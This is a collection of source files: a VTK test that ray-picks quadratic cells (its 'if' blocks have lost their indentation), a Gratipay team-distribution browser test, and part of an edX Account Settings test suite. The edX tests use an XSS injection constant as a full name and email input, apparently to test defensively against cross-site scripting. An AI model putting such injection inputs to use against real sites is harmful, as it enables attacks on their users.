triPoints.InsertPoint(1, 1.0, 0.0, 0.0)
triPoints.InsertPoint(2, 0.5, 0.8, 0.0)
triPoints.InsertPoint(3, 0.5, 0.0, 0.0)
triPoints.InsertPoint(4, 0.75, 0.4, 0.0)
triPoints.InsertPoint(5, 0.25, 0.4, 0.0)
triScalars = vtk.vtkFloatArray()
triScalars.SetNumberOfTuples(6)
triScalars.InsertValue(0, 0.0)
triScalars.InsertValue(1, 0.0)
triScalars.InsertValue(2, 0.0)
triScalars.InsertValue(3, 1.0)
triScalars.InsertValue(4, 0.0)
triScalars.InsertValue(5, 0.0)
aTri = vtk.vtkQuadraticTriangle()
aTri.GetPointIds().SetId(0, 0)
aTri.GetPointIds().SetId(1, 1)
aTri.GetPointIds().SetId(2, 2)
aTri.GetPointIds().SetId(3, 3)
aTri.GetPointIds().SetId(4, 4)
aTri.GetPointIds().SetId(5, 5)
aTriGrid = vtk.vtkUnstructuredGrid()
aTriGrid.Allocate(1, 1)
aTriGrid.InsertNextCell(aTri.GetCellType(), aTri.GetPointIds())
aTriGrid.SetPoints(triPoints)
aTriGrid.GetPointData().SetScalars(triScalars)
aTriMapper = vtk.vtkDataSetMapper()
aTriMapper.SetInputData(aTriGrid)
aTriMapper.ScalarVisibilityOff()
aTriActor = vtk.vtkActor()
aTriActor.SetMapper(aTriMapper)
aTriActor.GetProperty().SetRepresentationToWireframe()
aTriActor.GetProperty().SetAmbient(1.0)
# Quadratic quadrilateral
quadPoints = vtk.vtkPoints()
quadPoints.SetNumberOfPoints(8)
quadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
quadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
quadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
quadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
quadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
quadPoints.InsertPoint(5, 1.0, 0.5, 0.0)
quadPoints.InsertPoint(6, 0.5, 1.0, 0.0)
quadPoints.InsertPoint(7, 0.0, 0.5, 0.0)
quadScalars = vtk.vtkFloatArray()
quadScalars.SetNumberOfTuples(8)
quadScalars.InsertValue(0, 0.0)
quadScalars.InsertValue(1, 0.0)
quadScalars.InsertValue(2, 1.0)
quadScalars.InsertValue(3, 1.0)
quadScalars.InsertValue(4, 1.0)
quadScalars.InsertValue(5, 0.0)
quadScalars.InsertValue(6, 0.0)
quadScalars.InsertValue(7, 0.0)
aQuad = vtk.vtkQuadraticQuad()
aQuad.GetPointIds().SetId(0, 0)
aQuad.GetPointIds().SetId(1, 1)
aQuad.GetPointIds().SetId(2, 2)
aQuad.GetPointIds().SetId(3, 3)
aQuad.GetPointIds().SetId(4, 4)
aQuad.GetPointIds().SetId(5, 5)
aQuad.GetPointIds().SetId(6, 6)
aQuad.GetPointIds().SetId(7, 7)
aQuadGrid = vtk.vtkUnstructuredGrid()
aQuadGrid.Allocate(1, 1)
aQuadGrid.InsertNextCell(aQuad.GetCellType(), aQuad.GetPointIds())
aQuadGrid.SetPoints(quadPoints)
aQuadGrid.GetPointData().SetScalars(quadScalars)
aQuadMapper = vtk.vtkDataSetMapper()
aQuadMapper.SetInputData(aQuadGrid)
aQuadMapper.ScalarVisibilityOff()
aQuadActor = vtk.vtkActor()
aQuadActor.SetMapper(aQuadMapper)
aQuadActor.GetProperty().SetRepresentationToWireframe()
aQuadActor.GetProperty().SetAmbient(1.0)
# Quadratic tetrahedron
tetPoints = vtk.vtkPoints()
tetPoints.SetNumberOfPoints(10)
tetPoints.InsertPoint(0, 0.0, 0.0, 0.0)
tetPoints.InsertPoint(1, 1.0, 0.0, 0.0)
tetPoints.InsertPoint(2, 0.5, 0.8, 0.0)
tetPoints.InsertPoint(3, 0.5, 0.4, 1.0)
tetPoints.InsertPoint(4, 0.5, 0.0, 0.0)
tetPoints.InsertPoint(5, 0.75, 0.4, 0.0)
tetPoints.InsertPoint(6, 0.25, 0.4, 0.0)
tetPoints.InsertPoint(7, 0.25, 0.2, 0.5)
tetPoints.InsertPoint(8, 0.75, 0.2, 0.5)
tetPoints.InsertPoint(9, 0.50, 0.6, 0.5)
tetScalars = vtk.vtkFloatArray()
tetScalars.SetNumberOfTuples(10)
tetScalars.InsertValue(0, 1.0)
tetScalars.InsertValue(1, 1.0)
tetScalars.InsertValue(2, 1.0)
tetScalars.InsertValue(3, 1.0)
tetScalars.InsertValue(4, 0.0)
tetScalars.InsertValue(5, 0.0)
tetScalars.InsertValue(6, 0.0)
tetScalars.InsertValue(7, 0.0)
tetScalars.InsertValue(8, 0.0)
tetScalars.InsertValue(9, 0.0)
aTet = vtk.vtkQuadraticTetra()
aTet.GetPointIds().SetId(0, 0)
aTet.GetPointIds().SetId(1, 1)
aTet.GetPointIds().SetId(2, 2)
aTet.GetPointIds().SetId(3, 3)
aTet.GetPointIds().SetId(4, 4)
aTet.GetPointIds().SetId(5, 5)
aTet.GetPointIds().SetId(6, 6)
aTet.GetPointIds().SetId(7, 7)
aTet.GetPointIds().SetId(8, 8)
aTet.GetPointIds().SetId(9, 9)
aTetGrid = vtk.vtkUnstructuredGrid()
aTetGrid.Allocate(1, 1)
aTetGrid.InsertNextCell(aTet.GetCellType(), aTet.GetPointIds())
aTetGrid.SetPoints(tetPoints)
aTetGrid.GetPointData().SetScalars(tetScalars)
aTetMapper = vtk.vtkDataSetMapper()
aTetMapper.SetInputData(aTetGrid)
aTetMapper.ScalarVisibilityOff()
aTetActor = vtk.vtkActor()
aTetActor.SetMapper(aTetMapper)
aTetActor.GetProperty().SetRepresentationToWireframe()
aTetActor.GetProperty().SetAmbient(1.0)
# Quadratic hexahedron
hexPoints = vtk.vtkPoints()
hexPoints.SetNumberOfPoints(20)
hexPoints.InsertPoint(0, 0, 0, 0)
hexPoints.InsertPoint(1, 1, 0, 0)
hexPoints.InsertPoint(2, 1, 1, 0)
hexPoints.InsertPoint(3, 0, 1, 0)
hexPoints.InsertPoint(4, 0, 0, 1)
hexPoints.InsertPoint(5, 1, 0, 1)
hexPoints.InsertPoint(6, 1, 1, 1)
hexPoints.InsertPoint(7, 0, 1, 1)
hexPoints.InsertPoint(8, 0.5, 0, 0)
hexPoints.InsertPoint(9, 1, 0.5, 0)
hexPoints.InsertPoint(10, 0.5, 1, 0)
hexPoints.InsertPoint(11, 0, 0.5, 0)
hexPoints.InsertPoint(12, 0.5, 0, 1)
hexPoints.InsertPoint(13, 1, 0.5, 1)
hexPoints.InsertPoint(14, 0.5, 1, 1)
hexPoints.InsertPoint(15, 0, 0.5, 1)
hexPoints.InsertPoint(16, 0, 0, 0.5)
hexPoints.InsertPoint(17, 1, 0, 0.5)
hexPoints.InsertPoint(18, 1, 1, 0.5)
hexPoints.InsertPoint(19, 0, 1, 0.5)
hexScalars = vtk.vtkFloatArray()
hexScalars.SetNumberOfTuples(20)
hexScalars.InsertValue(0, 1.0)
hexScalars.InsertValue(1, 1.0)
hexScalars.InsertValue(2, 1.0)
hexScalars.InsertValue(3, 1.0)
hexScalars.InsertValue(4, 1.0)
hexScalars.InsertValue(5, 1.0)
hexScalars.InsertValue(6, 1.0)
hexScalars.InsertValue(7, 1.0)
hexScalars.InsertValue(8, 0.0)
hexScalars.InsertValue(9, 0.0)
hexScalars.InsertValue(10, 0.0)
hexScalars.InsertValue(11, 0.0)
hexScalars.InsertValue(12, 0.0)
hexScalars.InsertValue(13, 0.0)
hexScalars.InsertValue(14, 0.0)
hexScalars.InsertValue(15, 0.0)
hexScalars.InsertValue(16, 0.0)
hexScalars.InsertValue(17, 0.0)
hexScalars.InsertValue(18, 0.0)
hexScalars.InsertValue(19, 0.0)
aHex = vtk.vtkQuadraticHexahedron()
aHex.GetPointIds().SetId(0, 0)
aHex.GetPointIds().SetId(1, 1)
aHex.GetPointIds().SetId(2, 2)
aHex.GetPointIds().SetId(3, 3)
aHex.GetPointIds().SetId(4, 4)
aHex.GetPointIds().SetId(5, 5)
aHex.GetPointIds().SetId(6, 6)
aHex.GetPointIds().SetId(7, 7)
aHex.GetPointIds().SetId(8, 8)
aHex.GetPointIds().SetId(9, 9)
aHex.GetPointIds().SetId(10, 10)
aHex.GetPointIds().SetId(11, 11)
aHex.GetPointIds().SetId(12, 12)
aHex.GetPointIds().SetId(13, 13)
aHex.GetPointIds().SetId(14, 14)
aHex.GetPointIds().SetId(15, 15)
aHex.GetPointIds().SetId(16, 16)
aHex.GetPointIds().SetId(17, 17)
aHex.GetPointIds().SetId(18, 18)
aHex.GetPointIds().SetId(19, 19)
aHexGrid = vtk.vtkUnstructuredGrid()
aHexGrid.Allocate(1, 1)
aHexGrid.InsertNextCell(aHex.GetCellType(), aHex.GetPointIds())
aHexGrid.SetPoints(hexPoints)
aHexGrid.GetPointData().SetScalars(hexScalars)
aHexMapper = vtk.vtkDataSetMapper()
aHexMapper.SetInputData(aHexGrid)
aHexMapper.ScalarVisibilityOff()
aHexActor = vtk.vtkActor()
aHexActor.SetMapper(aHexMapper)
aHexActor.GetProperty().SetRepresentationToWireframe()
aHexActor.GetProperty().SetAmbient(1.0)
# Quadratic wedge
wedgePoints = vtk.vtkPoints()
wedgePoints.SetNumberOfPoints(15)
wedgePoints.InsertPoint(0, 0, 0, 0)
wedgePoints.InsertPoint(1, 1, 0, 0)
wedgePoints.InsertPoint(2, 0, 1, 0)
wedgePoints.InsertPoint(3, 0, 0, 1)
wedgePoints.InsertPoint(4, 1, 0, 1)
wedgePoints.InsertPoint(5, 0, 1, 1)
wedgePoints.InsertPoint(6, 0.5, 0, 0)
wedgePoints.InsertPoint(7, 0.5, 0.5, 0)
wedgePoints.InsertPoint(8, 0, 0.5, 0)
wedgePoints.InsertPoint(9, 0.5, 0, 1)
wedgePoints.InsertPoint(10, 0.5, 0.5, 1)
wedgePoints.InsertPoint(11, 0, 0.5, 1)
wedgePoints.InsertPoint(12, 0, 0, 0.5)
wedgePoints.InsertPoint(13, 1, 0, 0.5)
wedgePoints.InsertPoint(14, 0, 1, 0.5)
wedgeScalars = vtk.vtkFloatArray()
wedgeScalars.SetNumberOfTuples(15)
wedgeScalars.InsertValue(0, 1.0)
wedgeScalars.InsertValue(1, 1.0)
wedgeScalars.InsertValue(2, 1.0)
wedgeScalars.InsertValue(3, 1.0)
wedgeScalars.InsertValue(4, 1.0)
wedgeScalars.InsertValue(5, 1.0)
wedgeScalars.InsertValue(6, 1.0)
wedgeScalars.InsertValue(7, 1.0)
wedgeScalars.InsertValue(8, 0.0)
wedgeScalars.InsertValue(9, 0.0)
wedgeScalars.InsertValue(10, 0.0)
wedgeScalars.InsertValue(11, 0.0)
wedgeScalars.InsertValue(12, 0.0)
wedgeScalars.InsertValue(13, 0.0)
wedgeScalars.InsertValue(14, 0.0)
aWedge = vtk.vtkQuadraticWedge()
aWedge.GetPointIds().SetId(0, 0)
aWedge.GetPointIds().SetId(1, 1)
aWedge.GetPointIds().SetId(2, 2)
aWedge.GetPointIds().SetId(3, 3)
aWedge.GetPointIds().SetId(4, 4)
aWedge.GetPointIds().SetId(5, 5)
aWedge.GetPointIds().SetId(6, 6)
aWedge.GetPointIds().SetId(7, 7)
aWedge.GetPointIds().SetId(8, 8)
aWedge.GetPointIds().SetId(9, 9)
aWedge.GetPointIds().SetId(10, 10)
aWedge.GetPointIds().SetId(11, 11)
aWedge.GetPointIds().SetId(12, 12)
aWedge.GetPointIds().SetId(13, 13)
aWedge.GetPointIds().SetId(14, 14)
aWedgeGrid = vtk.vtkUnstructuredGrid()
aWedgeGrid.Allocate(1, 1)
aWedgeGrid.InsertNextCell(aWedge.GetCellType(), aWedge.GetPointIds())
aWedgeGrid.SetPoints(wedgePoints)
aWedgeGrid.GetPointData().SetScalars(wedgeScalars)
wedgeContours = vtk.vtkClipDataSet()
wedgeContours.SetInputData(aWedgeGrid)
wedgeContours.SetValue(0.5)
aWedgeContourMapper = vtk.vtkDataSetMapper()
aWedgeContourMapper.SetInputConnection(wedgeContours.GetOutputPort())
aWedgeContourMapper.ScalarVisibilityOff()
aWedgeMapper = vtk.vtkDataSetMapper()
aWedgeMapper.SetInputData(aWedgeGrid)
aWedgeMapper.ScalarVisibilityOff()
aWedgeActor = vtk.vtkActor()
aWedgeActor.SetMapper(aWedgeMapper)
aWedgeActor.GetProperty().SetRepresentationToWireframe()
aWedgeActor.GetProperty().SetAmbient(1.0)
aWedgeContourActor = vtk.vtkActor()
aWedgeContourActor.SetMapper(aWedgeContourMapper)
aWedgeContourActor.GetProperty().SetAmbient(1.0)
# Quadratic pyramid
pyraPoints = vtk.vtkPoints()
pyraPoints.SetNumberOfPoints(13)
pyraPoints.InsertPoint(0, 0, 0, 0)
pyraPoints.InsertPoint(1, 1, 0, 0)
pyraPoints.InsertPoint(2, 1, 1, 0)
pyraPoints.InsertPoint(3, 0, 1, 0)
pyraPoints.InsertPoint(4, 0, 0, 1)
pyraPoints.InsertPoint(5, 0.5, 0, 0)
pyraPoints.InsertPoint(6, 1, 0.5, 0)
pyraPoints.InsertPoint(7, 0.5, 1, 0)
pyraPoints.InsertPoint(8, 0, 0.5, 0)
pyraPoints.InsertPoint(9, 0, 0, 0.5)
pyraPoints.InsertPoint(10, 0.5, 0, 0.5)
pyraPoints.InsertPoint(11, 0.5, 0.5, 0.5)
pyraPoints.InsertPoint(12, 0, 0.5, 0.5)
pyraScalars = vtk.vtkFloatArray()
pyraScalars.SetNumberOfTuples(13)
pyraScalars.InsertValue(0, 1.0)
pyraScalars.InsertValue(1, 1.0)
pyraScalars.InsertValue(2, 1.0)
pyraScalars.InsertValue(3, 1.0)
pyraScalars.InsertValue(4, 1.0)
pyraScalars.InsertValue(5, 1.0)
pyraScalars.InsertValue(6, 1.0)
pyraScalars.InsertValue(7, 1.0)
pyraScalars.InsertValue(8, 0.0)
pyraScalars.InsertValue(9, 0.0)
pyraScalars.InsertValue(10, 0.0)
pyraScalars.InsertValue(11, 0.0)
pyraScalars.InsertValue(12, 0.0)
aPyramid = vtk.vtkQuadraticPyramid()
aPyramid.GetPointIds().SetId(0, 0)
aPyramid.GetPointIds().SetId(1, 1)
aPyramid.GetPointIds().SetId(2, 2)
aPyramid.GetPointIds().SetId(3, 3)
aPyramid.GetPointIds().SetId(4, 4)
aPyramid.GetPointIds().SetId(5, 5)
aPyramid.GetPointIds().SetId(6, 6)
aPyramid.GetPointIds().SetId(7, 7)
aPyramid.GetPointIds().SetId(8, 8)
aPyramid.GetPointIds().SetId(9, 9)
aPyramid.GetPointIds().SetId(10, 10)
aPyramid.GetPointIds().SetId(11, 11)
aPyramid.GetPointIds().SetId(12, 12)
aPyramidGrid = vtk.vtkUnstructuredGrid()
aPyramidGrid.Allocate(1, 1)
aPyramidGrid.InsertNextCell(aPyramid.GetCellType(), aPyramid.GetPointIds())
aPyramidGrid.SetPoints(pyraPoints)
aPyramidGrid.GetPointData().SetScalars(pyraScalars)
pyraContours = vtk.vtkClipDataSet()
pyraContours.SetInputData(aPyramidGrid)
pyraContours.SetValue(0.5)
aPyramidContourMapper = vtk.vtkDataSetMapper()
aPyramidContourMapper.SetInputConnection(pyraContours.GetOutputPort())
aPyramidContourMapper.ScalarVisibilityOff()
aPyramidMapper = vtk.vtkDataSetMapper()
aPyramidMapper.SetInputData(aPyramidGrid)
aPyramidMapper.ScalarVisibilityOff()
aPyramidActor = vtk.vtkActor()
aPyramidActor.SetMapper(aPyramidMapper)
aPyramidActor.GetProperty().SetRepresentationToWireframe()
aPyramidActor.GetProperty().SetAmbient(1.0)
aPyramidContourActor = vtk.vtkActor()
aPyramidContourActor.SetMapper(aPyramidContourMapper)
aPyramidContourActor.GetProperty().SetAmbient(1.0)
# Create the rendering related stuff.
# Since some of our actors are a single vertex, we need to remove all
# cullers so the single vertex actors will render
ren1 = vtk.vtkRenderer()
ren1.GetCullers().RemoveAllItems()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren1.SetBackground(.1, .2, .3)
renWin.SetSize(400, 200)
# specify properties
ren1.AddActor(aEdgeActor)
ren1.AddActor(aTriActor)
ren1.AddActor(aQuadActor)
ren1.AddActor(aTetActor)
ren1.AddActor(aHexActor)
ren1.AddActor(aWedgeActor)
ren1.AddActor(aPyramidActor)
# places everyone!!
aTriActor.AddPosition(2, 0, 0)
aQuadActor.AddPosition(4, 0, 0)
aTetActor.AddPosition(6, 0, 0)
aHexActor.AddPosition(8, 0, 0)
aWedgeActor.AddPosition(10, 0, 0)
aPyramidActor.AddPosition(12, 0, 0)
[base, back, left] = backdrop.BuildBackdrop(-1, 15, -1, 4, -1, 2, .1)
ren1.AddActor(base)
base.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(left)
left.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(back)
back.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.ResetCamera()
ren1.GetActiveCamera().Dolly(2.5)
ren1.ResetCameraClippingRange()
renWin.Render()
# create a little scorecard above each of the cells. These are displayed
# if a ray cast hits the cell, otherwise they are not shown.
pm = vtk.vtkPlaneSource()
pm.SetXResolution(1)
pm.SetYResolution(1)
pmapper = vtk.vtkPolyDataMapper()
pmapper.SetInputConnection(pm.GetOutputPort())
# now try intersecting rays with the cell
cellPicker = vtk.vtkCellPicker()
edgeCheck = vtk.vtkActor()
edgeCheck.SetMapper(pmapper)
edgeCheck.AddPosition(0.5, 2.5, 0)
cellPicker.Pick(87, 71, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aEdge.GetCellType()):
ren1.AddActor(edgeCheck)
triCheck = vtk.vtkActor()
triCheck.SetMapper(pmapper)
triCheck.AddPosition(2.5, 2.5, 0)
cellPicker.Pick(139, 72, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aTri.GetCellType()):
ren1.AddActor(triCheck)
quadCheck = vtk.vtkActor()
quadCheck.SetMapper(pmapper)
quadCheck.AddPosition(4.5, 2.5, 0)
cellPicker.Pick(192, 78, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aQuad.GetCellType()):
ren1.AddActor(quadCheck)
tetCheck = vtk.vtkActor()
tetCheck.SetMapper(pmapper)
tetCheck.AddPosition(6.5, 2.5, 0)
cellPicker.Pick(233, 70, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aTet.GetCellType()):
ren1.AddActor(tetCheck)
hexCheck = vtk.vtkActor()
hexCheck.SetMapper(pmapper)
hexCheck.AddPosition(8.5, 2.5, 0)
cellPicker.Pick(287, 80, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aHex.GetCellType()):
ren1.AddActor(hexCheck)
wedgeCheck = vtk.vtkActor()
wedgeCheck.SetMapper(pmapper)
wedgeCheck.AddPosition(10.5, 2.5, 0)
cellPicker.Pick(287, 80, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aWedge.GetCellType()):
ren1.AddActor(wedgeCheck)
pyraCheck = vtk.vtkActor()
pyraCheck.SetMapper(pmapper)
pyraCheck.AddPosition(12.5, 2.5, 0)
cellPicker.Pick(287, 80, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aPyramid.GetCellType()):
ren1.AddActor(pyraCheck)
# render the image
#
iren.Initialize()
#iren.Start()
|
HopeFOAM/HopeFOAM
|
ThirdParty-0.1/ParaView-5.0.1/VTK/Common/DataModel/Testing/Python/LineIntersectQuadraticCells.py
|
Python
|
gpl-3.0
| 17,068
|
[
"VTK"
] |
d9b02cc114e64829cce4d3d35665a5bc5423f125947799750a265edbdaf50241
|
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.testing import BrowserHarness, D,P
from selenium.webdriver.common.keys import Keys
class Tests(BrowserHarness):
def setUp(self):
BrowserHarness.setUp(self)
self.enterprise = self.make_team(available=500)
self.alice = self.make_participant( 'alice'
, claimed_time='now'
, email_address='alice@example.com'
, verified_in='TT'
)
def test_owner_can_add_a_member(self):
self.sign_in('picard')
self.visit('/TheEnterprise/distributing/')
self.css('.lookup-container .query').first.fill('alice')
self.css('.lookup-container button').first.click()
self.wait_for('table.team a')
assert [a.text for a in self.css('table.team a')] == ['alice']
def set_take(self, amount):
el = self.css('table.team form.edit input').first
el.fill(amount)
el.type(Keys.ENTER)
def test_member_can_set_their_take(self):
self.enterprise.add_member(self.alice, P('picard'))
self.sign_in('alice')
self.visit('/TheEnterprise/distributing/')
self.set_take('5.37')
assert self.wait_for_success() == 'Your take is now $5.37.'
assert self.enterprise.get_take_for(self.alice) == D('5.37')
def test_member_can_set_their_take_again(self):
self.test_member_can_set_their_take()
self.set_take('100')
assert self.wait_for_success() == 'Your take is now $100.00.'
assert self.enterprise.get_take_for(self.alice) == D('100.00')
def test_owner_can_remove_a_member(self):
self.enterprise.add_member(self.alice, P('picard'))
self.sign_in('picard')
self.visit('/TheEnterprise/distributing/')
self.css('table.team span.remove').first.click()
self.wait_for('.confirmation-modal .yes').first.click()
assert self.wait_for_success() == 'alice has been removed from the team.'
assert self.enterprise.get_memberships() == []
def test_members_are_sorted_by_amount_ascending(self):
bob = self.make_participant( 'bob'
, claimed_time='now'
, email_address='bob@example.com'
, verified_in='TT'
)
self.enterprise.add_member(self.alice, P('picard'))
self.enterprise.add_member(bob, P('picard'))
self.enterprise.set_take_for(self.alice, D('5.00'), self.alice)
self.enterprise.set_take_for(bob, D('37.00'), bob)
self.visit('/TheEnterprise/distributing/')
assert [a.text for a in self.css('table.team a')] == ['alice', 'bob']
self.enterprise.set_take_for(bob, D('4.00'), bob)
self.visit('/TheEnterprise/distributing/')
assert [a.text for a in self.css('table.team a')] == ['bob', 'alice']
def test_totals_are_as_expected(self):
bob = self.make_participant( 'bob'
, claimed_time='now'
, email_address='bob@example.com'
, verified_in='TT'
)
self.enterprise.add_member(self.alice, P('picard'))
self.enterprise.add_member(bob, P('picard'))
self.enterprise.set_take_for(self.alice, D('5.00'), self.alice)
self.enterprise.set_take_for(bob, D('37.00'), bob)
self.visit('/TheEnterprise/distributing/')
assert self.css('tr.totals .take').first.text == '42.00'
assert self.css('tr.totals .balance').first.text == '458.00'
assert self.css('tr.totals .percentage').first.text == '91.6'
|
gratipay/gratipay.com
|
tests/ttw/test_team_distributing.py
|
Python
|
mit
| 3,894
|
[
"VisIt"
] |
4ef7bbb4ec49da71f3ae586011f2b135161c14c0cfccd9c35cfb0153d3a7a3e8
|
# -*- coding: utf-8 -*-
"""
End-to-end tests for the Account Settings page.
"""
from unittest import skip
from nose.plugins.attrib import attr
from bok_choy.web_app_test import WebAppTest
from bok_choy.page_object import XSS_INJECTION
from ...pages.lms.account_settings import AccountSettingsPage
from ...pages.lms.auto_auth import AutoAuthPage
from ...pages.lms.dashboard import DashboardPage
from ..helpers import EventsTestMixin
class AccountSettingsTestMixin(EventsTestMixin, WebAppTest):
"""
Mixin with helper methods to test the account settings page.
"""
CHANGE_INITIATED_EVENT_NAME = u"edx.user.settings.change_initiated"
USER_SETTINGS_CHANGED_EVENT_NAME = 'edx.user.settings.changed'
ACCOUNT_SETTINGS_REFERER = u"/account/settings"
def visit_account_settings_page(self):
"""
Visit the account settings page for the current user, and store the page instance
as self.account_settings_page.
"""
# pylint: disable=attribute-defined-outside-init
self.account_settings_page = AccountSettingsPage(self.browser)
self.account_settings_page.visit()
self.account_settings_page.wait_for_ajax()
def log_in_as_unique_user(self, email=None, full_name=None):
"""
Create a unique user and return the account's username and id.
"""
username = "test_{uuid}".format(uuid=self.unique_id[0:6])
auto_auth_page = AutoAuthPage(self.browser, username=username, email=email, full_name=full_name).visit()
user_id = auto_auth_page.get_user_id()
return username, user_id
def settings_changed_event_filter(self, event):
"""Filter out any events that are not "settings changed" events."""
return event['event_type'] == self.USER_SETTINGS_CHANGED_EVENT_NAME
def expected_settings_changed_event(self, setting, old, new, table=None):
"""A dictionary representing the expected fields in a "settings changed" event."""
return {
'username': self.username,
'referer': self.get_settings_page_url(),
'event': {
'user_id': self.user_id,
'setting': setting,
'old': old,
'new': new,
'truncated': [],
'table': table or 'auth_userprofile'
}
}
def settings_change_initiated_event_filter(self, event):
"""Filter out any events that are not "settings change initiated" events."""
return event['event_type'] == self.CHANGE_INITIATED_EVENT_NAME
def expected_settings_change_initiated_event(self, setting, old, new, username=None, user_id=None):
"""A dictionary representing the expected fields in a "settings change initiated" event."""
return {
'username': username or self.username,
'referer': self.get_settings_page_url(),
'event': {
'user_id': user_id or self.user_id,
'setting': setting,
'old': old,
'new': new,
}
}
def get_settings_page_url(self):
"""The absolute URL of the account settings page given the test context."""
return self.relative_path_to_absolute_uri(self.ACCOUNT_SETTINGS_REFERER)
def assert_no_setting_changed_event(self):
"""Assert no setting changed event has been emitted thus far."""
self.assert_no_matching_events_were_emitted({'event_type': self.USER_SETTINGS_CHANGED_EVENT_NAME})
@attr('shard_8')
class DashboardMenuTest(AccountSettingsTestMixin, WebAppTest):
"""
Tests that the dashboard menu works correctly with the account settings page.
"""
def test_link_on_dashboard_works(self):
"""
Scenario: Verify that the "Account" link works from the dashboard.
Given that I am a registered user
And I visit my dashboard
And I click on "Account" in the top drop down
Then I should see my account settings page
"""
self.log_in_as_unique_user()
dashboard_page = DashboardPage(self.browser)
dashboard_page.visit()
dashboard_page.click_username_dropdown()
self.assertIn('Account', dashboard_page.username_dropdown_link_text)
dashboard_page.click_account_settings_link()
@attr('shard_8')
class AccountSettingsPageTest(AccountSettingsTestMixin, WebAppTest):
"""
Tests that verify behaviour of the Account Settings page.
"""
SUCCESS_MESSAGE = 'Your changes have been saved.'
def setUp(self):
"""
Initialize account and pages.
"""
super(AccountSettingsPageTest, self).setUp()
self.full_name = XSS_INJECTION
self.username, self.user_id = self.log_in_as_unique_user(full_name=self.full_name)
self.visit_account_settings_page()
def test_page_view_event(self):
"""
Scenario: An event should be recorded when the "Account Settings"
page is viewed.
Given that I am a registered user
And I visit my account settings page
Then a page view analytics event should be recorded
"""
actual_events = self.wait_for_events(
event_filter={'event_type': 'edx.user.settings.viewed'}, number_of_matches=1)
self.assert_events_match(
[
{
'event': {
'user_id': self.user_id,
'page': 'account',
'visibility': None
}
}
],
actual_events
)
def test_all_sections_and_fields_are_present(self):
"""
Scenario: Verify that all sections and fields are present on the page.
"""
expected_sections_structure = [
{
'title': 'Basic Account Information (required)',
'fields': [
'Username',
'Full Name',
'Email Address',
'Password',
'Language',
'Country or Region'
]
},
{
'title': 'Additional Information (optional)',
'fields': [
'Education Completed',
'Gender',
'Year of Birth',
'Preferred Language',
]
},
{
'title': 'Connected Accounts',
'fields': [
'Dummy',
'Facebook',
'Google',
]
}
]
self.assertEqual(self.account_settings_page.sections_structure(), expected_sections_structure)
def _test_readonly_field(self, field_id, title, value):
"""
Test behavior of a readonly field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.value_for_readonly_field(field_id), value)
def _test_text_field(
self, field_id, title, initial_value, new_invalid_value, new_valid_values, success_message=SUCCESS_MESSAGE,
assert_after_reload=True
):
"""
Test behaviour of a text field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.value_for_text_field(field_id), initial_value)
self.assertEqual(
self.account_settings_page.value_for_text_field(field_id, new_invalid_value), new_invalid_value
)
self.account_settings_page.wait_for_indicator(field_id, 'validation-error')
self.browser.refresh()
self.assertNotEqual(self.account_settings_page.value_for_text_field(field_id), new_invalid_value)
for new_value in new_valid_values:
self.assertEqual(self.account_settings_page.value_for_text_field(field_id, new_value), new_value)
self.account_settings_page.wait_for_message(field_id, success_message)
if assert_after_reload:
self.browser.refresh()
self.assertEqual(self.account_settings_page.value_for_text_field(field_id), new_value)
def _test_dropdown_field(
self, field_id, title, initial_value, new_values, success_message=SUCCESS_MESSAGE, reloads_on_save=False
):
"""
Test behaviour of a dropdown field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.value_for_dropdown_field(field_id), initial_value)
for new_value in new_values:
self.assertEqual(self.account_settings_page.value_for_dropdown_field(field_id, new_value), new_value)
self.account_settings_page.wait_for_message(field_id, success_message)
if reloads_on_save:
self.account_settings_page.wait_for_loading_indicator()
else:
self.browser.refresh()
self.account_settings_page.wait_for_page()
self.assertEqual(self.account_settings_page.value_for_dropdown_field(field_id), new_value)
def _test_link_field(self, field_id, title, link_title, success_message):
"""
Test behaviour a link field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.link_title_for_link_field(field_id), link_title)
self.account_settings_page.click_on_link_in_link_field(field_id)
self.account_settings_page.wait_for_message(field_id, success_message)
def test_username_field(self):
"""
Test behaviour of "Username" field.
"""
self._test_readonly_field('username', 'Username', self.username)
def test_full_name_field(self):
"""
Test behaviour of "Full Name" field.
"""
self._test_text_field(
u'name',
u'Full Name',
self.full_name,
u'@',
[u'another name', self.full_name],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event('name', self.full_name, 'another name'),
self.expected_settings_changed_event('name', 'another name', self.full_name),
],
actual_events
)
def test_email_field(self):
"""
Test behaviour of "Email" field.
"""
email = u"test@example.com"
username, user_id = self.log_in_as_unique_user(email=email)
self.visit_account_settings_page()
self._test_text_field(
u'email',
u'Email Address',
email,
u'test@example.com' + XSS_INJECTION,
